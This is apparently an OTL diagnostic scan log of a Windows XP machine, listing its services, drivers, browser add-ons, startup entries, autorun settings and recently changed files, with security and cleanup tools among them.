[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2003/05/29 15:52:52 | 00,065,795 | ---- | M] (HP) -- C:\WINDOWS\system32\spool\drivers\w32x86\3\HPZIPM12.EXE -- (Pml Driver HPZ12 [On_Demand | Stopped])
[2008/10/27 09:55:45 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 17:55:27 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:04:19 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:32:14 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:04:39 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:04:15 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
[2008/08/07 15:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2009/02/05 15:05:11 | 00,026,944 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4 [System | Running])
[2002/04/01 14:15:00 | 00,004,816 | ---- | M] (Andrea Electronics Corporation) -- C:\WINDOWS\system32\drivers\aeaudio.sys -- (aeaudio [On_Demand | Running])
[2009/02/05 15:07:12 | 00,020,560 | ---- | M] (ALWIL Software) -- C:\WINDOWS\system32\drivers\aswFsBlk.sys -- (aswFsBlk [Auto | Running])
[2009/02/05 15:08:10 | 00,094,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2 [Auto | Running])
[2009/02/05 15:06:10 | 00,023,152 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (aswRdr [On_Demand | Running])
[2009/02/05 15:07:23 | 00,114,768 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP [System | Running])
[2009/02/05 15:06:20 | 00,051,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi [System | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/04/14 00:09:48 | 00,206,976 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4.sys -- (dot4 [On_Demand | Stopped])
[2001/08/17 13:47:32 | 00,012,928 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4Prt.sys -- (Dot4Print [On_Demand | Stopped])
[2001/08/17 13:47:32 | 00,023,808 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4usb.sys -- (dot4usb [On_Demand | Stopped])
[2005/06/13 12:58:04 | 00,162,816 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\e100b325.sys -- (E100B [On_Demand | Running])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/09/20 10:00:54 | 01,302,332 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Stopped])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2001/08/22 08:42:58 | 00,013,632 | ---- | M] (Dell Computer Corporation) -- C:\WINDOWS\system32\drivers\omci.sys -- (OMCI [System | Running])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2004/09/23 02:03:00 | 00,020,576 | ---- | M] (Sonic Solutions) -- C:\WINDOWS\system32\drivers\pxhelp20.sys -- (PxHelp20 [Boot | Running])
[2009/02/26 06:23:02 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 07:22:09 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2003/05/06 09:14:34 | 00,580,992 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 21:09:51 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])
[2003/04/15 10:40:54 | 00,113,504 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmsbw.sys -- ({6080A529-897E-4629-A488-ABA0C29B635E} [On_Demand | Stopped])
[2003/04/15 10:40:46 | 00,078,752 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmkchw.sys -- ({D31A0762-0CEB-444e-ACFF-B049A1F6FE91} [On_Demand | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://go.microsoft.com/fwlink/?LinkId=69157
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{02478D38-C3F9-4efb-9B51-7695ECA05670} (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{68F9551E-0411-48E4-9AAF-4BC42A6A46BE} (HKLM) -- C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll ()
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (HKLM) -- C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
{AA58ED58-01DD-4d91-8333-CF10577473F7} (HKLM) -- c:\Program Files\Google\GoogleToolbar1.dll (Google Inc.)
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (HKLM) -- C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll (Google Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" (HKLM) -- c:\Program Files\Google\GoogleToolbar1.dll (Google Inc.)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{327C2873-E90D-4c37-AA9D-10AC9BABA46C}" (HKLM) -- C:\Program Files\Canon\Easy-WebPrint\Toolband.dll ()

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{EF99BD32-C1FB-11D2-892F-0090271D4F88}" (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"avast!"=C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe (ALWIL Software)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"OpwareSE2"="C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe" (ScanSoft, Inc.)
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" -atboottime (Apple Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

========== (O4) RunOnceEx Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
""= File not found

========== (O4) Startup Folders ==========

[2009/01/28 07:32:24 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Kodak software updater.lnk = C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1
"NoDriveTypeAutoRun"=255

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=1
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O8) IE Context Menu Extensions ==========

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\]
E&xport to Microsoft Excel: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE [2008/10/18 19:30:22 | 17,931,616 | ---- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Internet Explorer\MenuExt\]
E&xport to Microsoft Excel: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE [2008/10/18 19:30:22 | 17,931,616 | ---- | M] (Microsoft Corporation)

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{05CA9FB0-3E3E-4B36-BF41-0E3A5CAA8CD8}: http://download.microsoft.com/download/e/4.../OGAControl.cab -- Office Genuine Advantage Validation Tool
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/pub/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207583621953 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_05
{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_07
{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7}: http://wwwimages.adobe.com/www.adobe.com/p...obat/nos/gp.cab -- get_atlcom Class
{D27CDB6E-AE6D-11CF-96B8-444553540000}: http://fpdownload2.macromedia.com/get/flas...ent/swflash.cab -- Shockwave Flash Object

========== (O17) DNS Name Servers ==========

{720F02B9-5075-43F0-94E6-6DA8794CF151} (Servers: | Description: Intel® PRO/100 VE Network Connection)
{8F7A4464-81D4-41DD-A0B3-6A6A2E8643FF} (Servers: | Description: )

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:04:34 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

AUTOEXEC.BAT []
[2008/04/07 10:34:23 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]

auto []
[2009/04/02 10:37:46 | 00,000,000 | -HSD | M] -- E:\auto -- [ FAT ]

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 13:45:28 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2009/04/02 13:38:09 | 00,401,720 | ---- | C] (Trend Micro Inc.) -- C:\HiJackThis.exe
[2009/04/01 13:45:26 | 00,023,152 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2009/04/01 13:45:26 | 00,001,724 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Antivirus.lnk
[2009/04/01 13:45:24 | 00,051,376 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2009/04/01 13:45:22 | 00,026,944 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2009/04/01 13:45:19 | 00,097,480 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\AvastSS.scr
[2009/04/01 13:45:18 | 00,114,768 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2009/04/01 13:45:18 | 00,094,032 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2009/04/01 13:45:18 | 00,093,296 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2009/04/01 13:45:18 | 00,020,560 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2009/04/01 13:44:59 | 01,256,296 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2009/04/01 13:44:59 | 00,380,928 | ---- | C] () -- C:\WINDOWS\System32\actskin4.ocx
[2009/04/01 13:44:55 | 00,000,000 | ---D | C] -- C:\Program Files\Alwil Software
[2009/04/01 13:44:24 | 00,612,740 | ---- | C] () -- C:\cc_20090401_134419.reg
[2009/04/01 13:21:59 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 13:03:09 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
[2009/04/01 13:03:03 | 00,000,000 | ---D | C] -- C:\Program Files\Yahoo!
[2009/04/01 13:02:50 | 00,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2009/04/01 11:05:11 | 00,000,000 | R-SD | C] -- C:\assembly
[2009/04/01 08:17:06 | 00,082,944 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\IEDFix.C.exe
[2009/04/01 08:17:06 | 00,080,384 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\o4Patch.exe
[2009/04/01 08:17:06 | 00,078,336 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\Agent.OMZ.Fix.exe
[2009/04/01 08:17:04 | 00,288,417 | ---- | C] (S!Ri) -- C:\WINDOWS\System32\SrchSTS.exe
[2009/04/01 08:17:04 | 00,053,248 | ---- | C] (http://www.beyondlogic.org) -- C:\WINDOWS\System32\Process.exe
[2009/04/01 08:12:16 | 00,000,000 | ---D | C] -- C:\ERDNT
[2009/04/01 08:12:13 | 00,000,000 | ---D | C] -- C:\WINDOWS\ERUNT
[2009/04/01 08:12:13 | 00,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2009/04/01 08:11:34 | 00,000,000 | ---D | C] -- C:\!FixIEDef
[2009/03/30 11:04:40 | 00,000,000 | ---D | C] -- C:\WINDOWS\pss
[2009/03/27 09:01:01 | 03,776,976 | -H-- | C] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\IconCache.db
[2009/03/27 08:58:48 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Apple Computer
[2009/03/27 08:58:22 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Application Data\SMART Technologies Inc
[2009/03/27 08:58:05 | 00,071,328 | ---- | C] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2009/03/27 08:57:42 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Application Data\Identities
[2009/03/27 08:57:37 | 00,000,077 | -HS- | C] () -- C:\Documents and Settings\dreger\My Documents\desktop.ini
[2009/03/27 08:57:37 | 00,000,000 | R--D | C] -- C:\Documents and Settings\dreger\My Documents\My Pictures
[2009/03/27 08:57:37 | 00,000,000 | R--D | C] -- C:\Documents and Settings\dreger\My Documents\My Music
[2009/03/27 08:57:32 | 00,000,062 | -HS- | C] () -- C:\Documents and Settings\dreger\Application Data\desktop.ini
[2009/03/27 08:57:31 | 00,000,084 | -HS- | C] () -- C:\Documents and Settings\dreger\Start Menu\Programs\Startup\desktop.ini
[2009/03/27 08:57:30 | 00,000,000 | --SD | C] -- C:\Documents and Settings\dreger\Application Data\Microsoft
[2009/03/27 08:57:30 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Microsoft Help
[2009/03/27 08:57:30 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Microsoft
[2009/03/18 09:33:58 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/18 09:33:58 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/17 12:56:39 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\NOS
[2009/03/17 12:56:37 | 00,000,000 | ---D | C] -- C:\Program Files\NOS
[2009/03/10 22:18:14 | 00,934,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaTray.exe
[2009/03/10 22:18:14 | 00,934,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\WgaTray.exe
[2009/03/10 22:18:00 | 00,239,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaLogon.dll
[2009/03/10 22:18:00 | 00,239,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wgaLogon.dll
[2009/02/11 14:08:05 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU
[2009/02/02 08:56:08 | 00,000,000 | ---D | C] -- C:\Program Files\Lightspeed Systems

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 13:45:40 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 13:45:19 | 00,065,536 | R--- | M] () -- C:\Documents and Settings\All Users\Documents\ESBK.mbb
[2009/04/02 13:45:18 | 00,079,872 | R--- | M] () -- C:\Documents and Settings\All Users\Documents\ESBK.mb
